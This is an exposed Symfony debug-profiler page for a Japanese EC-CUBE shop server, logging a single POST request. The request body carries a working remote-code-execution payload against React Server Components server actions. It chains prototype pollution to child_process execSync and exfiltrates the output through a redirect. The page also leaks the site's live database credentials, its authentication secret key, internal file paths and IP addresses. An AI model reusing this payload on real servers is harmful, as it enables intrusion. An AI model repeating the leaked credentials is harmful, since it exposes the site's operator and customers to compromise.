https:///

n/a

Request

GET Parameters

No GET parameters

POST Parameters

Key Value
0
"{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('pwd').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}"
1
""$@0""
2
"[]"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_remove_csp_headers
true
_stopwatch_token
"cf7c04"

Request Headers

Header Value
accept
"text/x-component"
accept-encoding
"gzip, deflate, br"
accept-language
"ja-JP,ja;q=0.9,en;q=0.8"
cache-control
"no-cache"
connection
"keep-alive"
content-length
"702"
content-type
"multipart/form-data; boundary=---------------------------70608620589376"
host
"133.242.182.188"
next-action
"x"
upgrade-insecure-requests
"1"
user-agent
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
x-php-ob-level
"1"

Request Content

Request content not available (it was retrieved as a resource).

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=UTF-8"
date
"Tue, 21 Apr 2026 16:41:47 GMT"
set-cookie
"maintenance_token=deleted; expires=Mon, 21-Apr-2025 16:41:46 GMT; Max-Age=0; path=/; httponly"
x-debug-exception
"Untrusted%20Host%20%22133.242.182.188%22."
x-debug-exception-file
"%2Fhome%2Fgsuser%2Frepository%2Fgsec-web%2Fvendor%2Fsymfony%2Fhttp-kernel%2FHttpKernel.php:78"
x-debug-token
"08bfde"
x-debug-token-link
"/_profiler/fd9140"
x-previous-debug-token
"fd9140"
x-robots-tag
"noindex"

Cookies

Request Cookies

No request cookies

Response Cookies

Key Value
maintenance_token
Symfony\Component\HttpFoundation\Cookie {#6490
  #name: "maintenance_token"
  #value: null
  #domain: null
  #expire: 1
  #path: "/"
  #secure: false
  #httpOnly: true
  -raw: false
  -sameSite: null
  -secureDefault: true
}

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
(no data)

Defined as regular env variables

Key Value
APP_DEBUG
"1"
APP_ENV
"dev"
CONTENT_LENGTH
"702"
CONTENT_TYPE
"multipart/form-data; boundary=---------------------------70608620589376"
DATABASE_CHARSET
"utf8"
DATABASE_SERVER_VERSION
"8"
DATABASE_URL
"mysql://gsec:wsxCft6New@127.0.0.1/gsecdb"
DOCUMENT_ROOT
"/var/www/html/ec.gs.ntsup.jp"
DOCUMENT_URI
"/index.php"
ECCUBE_ADMIN_ALLOW_HOSTS
"[]"
ECCUBE_ADMIN_ROUTE
"admin"
ECCUBE_AUTH_MAGIC
"VAIcd4MPGr0hjPHfMGMdDstqYQlSAG9b"
ECCUBE_COOKIE_PATH
"/"
ECCUBE_FORCE_SSL
"0"
ECCUBE_LOCALE
"ja"
ECCUBE_TEMPLATE_CODE
"default"
FCGI_ROLE
"RESPONDER"
GATEWAY_INTERFACE
"CGI/1.1"
HOME
"/var/lib/nginx"
HTTPS
"on"
HTTP_ACCEPT
"text/x-component"
HTTP_ACCEPT_ENCODING
"gzip, deflate, br"
HTTP_ACCEPT_LANGUAGE
"ja-JP,ja;q=0.9,en;q=0.8"
HTTP_CACHE_CONTROL
"no-cache"
HTTP_CONNECTION
"keep-alive"
HTTP_CONTENT_LENGTH
"702"
HTTP_CONTENT_TYPE
"multipart/form-data; boundary=---------------------------70608620589376"
HTTP_HOST
"133.242.182.188"
HTTP_NEXT_ACTION
"x"
HTTP_UPGRADE_INSECURE_REQUESTS
"1"
HTTP_USER_AGENT
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
MAILER_DSN
"null://null"
PHP_SELF
"/index.php"
QUERY_STRING
""
REDIRECT_STATUS
"200"
REMOTE_ADDR
"160.25.62.85"
REMOTE_PORT
"34398"
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"https"
REQUEST_TIME
1776789707
REQUEST_TIME_FLOAT
1776789707.3626
REQUEST_URI
"/"
SCRIPT_FILENAME
"/var/www/html/ec.gs.ntsup.jp/index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"133.242.182.188"
SERVER_NAME
"ec.gs.ntsup.jp"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SOFTWARE
"nginx/1.20.1"
TRUSTED_HOSTS
"^ec.gs.ntsup.jp$"
USER
"nginx"

Sub Requests 1

ErrorController (token = fd9140)

Key Value
_controller
"error_controller"
_stopwatch_token
"cc12dc"
exception
Symfony\Component\HttpKernel\Exception\BadRequestHttpException {#464
  #message: "Untrusted Host "133.242.182.188"."
  #code: 0
  #file: "/home/gsuser/repository/gsec-web/vendor/symfony/http-kernel/HttpKernel.php"
  #line: 78
  -previous: Symfony\Component\HttpFoundation\Exception\SuspiciousOperationException {#3331 …}
  -statusCode: 400
  -headers: []
  trace: {
    /home/gsuser/repository/gsec-web/vendor/symfony/http-kernel/HttpKernel.php:78 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › if ($e instanceof RequestExceptionInterface) {    $e = new BadRequestHttpException($e->getMessage(), $e);}
    }
    /home/gsuser/repository/gsec-web/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /home/gsuser/repository/gsec-web/index.php:83 {$kernel = new Kernel($env, $debug);$response = $kernel->handle($request);$response->send();
    }
  }
}
logger
Symfony\Bridge\Monolog\Logger {#471 …8}